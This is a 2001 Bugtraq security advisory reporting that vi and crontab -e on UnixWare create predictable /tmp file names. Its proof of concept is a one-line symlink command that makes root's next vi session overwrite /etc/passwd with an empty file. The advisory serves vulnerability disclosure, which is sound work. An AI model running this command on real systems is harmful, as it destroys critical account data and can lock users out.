From thief@snosoft.com Tue May 29 10:30:59 2001 From: Richard Johnson To: bugtraq@securityfocus.com Cc: "Recon@Snosoft. Com" Date: Tue, 22 May 2001 14:15:16 -0400 Subject: [SRT2001-09] - vi and crontab -e /tmp issues [The following text is in the "iso-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] ====================================================================== Strategic Reconnaissance Team Security Advisory(SRT2001-9) Topic: vi and crontab -e /tmp issues Vendor: Santa Cruz Operations Release Date: 05/07/01 ====================================================================== .: Description vi makes poor use of /tmp. File names are very predictable .: Impact as a user ln -s /etc/passwd /tmp/Ex04161 wait for root to run vi and viola when he does he will clobber /etc/passwd with a null file .: Workaround don't use vi or crontab -e .: Systems Affected Unixware 5.x .: Proof of Concept ln -s /etc/passwd /tmp/Ex04161 .: Vendor Status A copy of this advisory was mailed to their attention .: Credit Kevin Finisterre dotslash@snosoft.com ====================================================================== ©Copyright 2001 Secure Network Operations , Inc. All Rights Reserved. Strategic Reconnaissance Team | recon@snosoft.com http://recon.snosoft.com | http://www.snosoft.com ----------------------------------------------------------------------